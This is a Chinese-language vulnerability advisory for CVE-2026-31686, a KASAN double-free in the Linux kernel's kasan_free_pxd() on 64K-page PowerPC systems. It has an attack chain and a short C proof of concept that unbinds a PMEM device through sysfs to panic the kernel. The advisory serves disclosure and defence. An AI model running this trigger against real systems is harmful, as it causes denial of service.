CVE-2026-31686 CVSS 7.8 高危

CVE-2026-31686: Linux内核KASAN双重释放漏洞

披露日期: 2026-04-27

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31686

漏洞类型

双重释放

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

该漏洞存在于Linux内核的内存管理子系统中，具体涉及KASAN（内核地址消毒剂）机制对页目录（pXds）的处理。问题的根源在于`kasan_free_pxd()`函数错误地假设页表始终与结构页对齐。然而，在某些架构（如使用64K页大小的PowerPC）上，PUD表可能来自名为`pgtable-2^9`的slab缓存，并不一定满足这种对齐要求。这导致在使用`page_to_virt(pxd_page())`时获取了错误的地址，进而引发双重释放错误。该错误会导致系统在处理PMEM（持久内存）相关操作（如ndctl命令）时触发内核崩溃，严重影响了系统的稳定性和可用性。

技术细节

漏洞的核心在于Linux内核`mm/kasan.c`中的`kasan_free_pxd()`函数实现缺陷。该函数原本设计用于释放KASAN的页目录影子内存。在实现中，它通过`page_to_virt(pxd_page())`来获取要释放的内存地址，这隐含了页表项（PUD/PMD等）必须直接映射到一个完整的`struct page`的假设。然而，在PowerPC等特定架构上，特别是当启用64KB页面大小时，页目录表（例如PUD表）的大小为4096字节。为了节省内存，这些表并非总是从伙伴系统分配，而是从专用的slab缓存（如`pgtable-2^9`）中分配。由于slab分配的对象不一定具备`struct page`对齐的特性，直接使用`page_to_virt`转换会导致地址计算错误。当系统尝试释放这些内存时，由于地址计算错误，内核尝试释放一个已经被释放或无效的内存区域，从而触发了KASAN的double-free检测机制。攻击者或本地低权限用户可以通过触发特定的内存管理操作（例如利用`ndctl`工具管理持久内存命名空间）来诱发该崩溃，导致系统拒绝服务。

攻击链分析

STEP 1

1. 获取访问权限

攻击者需要在目标系统上拥有本地低权限用户账号（PR:L）。

STEP 2

2. 环境侦察

确认目标系统运行的是受影响的Linux内核版本，且架构为PowerPC（特别是64K页面配置），并启用了PMEM相关驱动。

STEP 3

3. 触发漏洞

攻击者利用`ndctl`工具或直接向sysfs文件系统写入数据，执行解绑（unbind）PMEM设备的操作。

STEP 4

4. 内核错误执行

内核执行`kasan_free_pxd()`函数，由于错误的地址计算（page_to_virt假设不成立），尝试释放已释放的内存。

STEP 5

5. 系统崩溃

KASAN检测到双重释放，触发kernel panic，导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31686
 * This PoC attempts to trigger the double free by unbinding a PMEM driver,
 * which mimics the action seen in the crash log (unbind_store).
 * Requirements: Local access, vulnerable kernel (PowerPC 64K pages).
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

#define UNBIND_PATH "/sys/bus/nd/drivers/nfit/unbind"
#define DEVICE_NAME "ndbus0_region0" // Example device, may vary

int main() {
    int fd;
    ssize_t written;

    printf("[+] Attempting to trigger CVE-2026-31686...");
    printf("[+] Target: Unbinding device to trigger kasan_free_pxd bug");

    // Open the unbind sysfs entry
    fd = open(UNBIND_PATH, O_WRONLY);
    if (fd < 0) {
        perror("[-] Failed to open unbind path");
        return 1;
    }

    // Write the device name to unbind the driver
    // This triggers the driver release path -> memunmap_pages -> kasan_remove_zero_shadow
    written = write(fd, DEVICE_NAME, strlen(DEVICE_NAME));
    if (written < 0) {
        perror("[-] Failed to write to unbind path");
        close(fd);
        return 1;
    }

    printf("[+] Payload sent. If vulnerable, the kernel should panic due to double-free.");
    close(fd);
    return 0;
}

影响范围

Linux Kernel 6.19-rc1 及之前版本

Linux Kernel Stable 分支特定提交之前的版本

防御指南

临时缓解措施

在未升级内核前，应严格限制本地用户的权限，防止其操作PMEM设备或执行相关的管理命令。同时，监控系统日志中关于KASAN double-free的错误报告。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表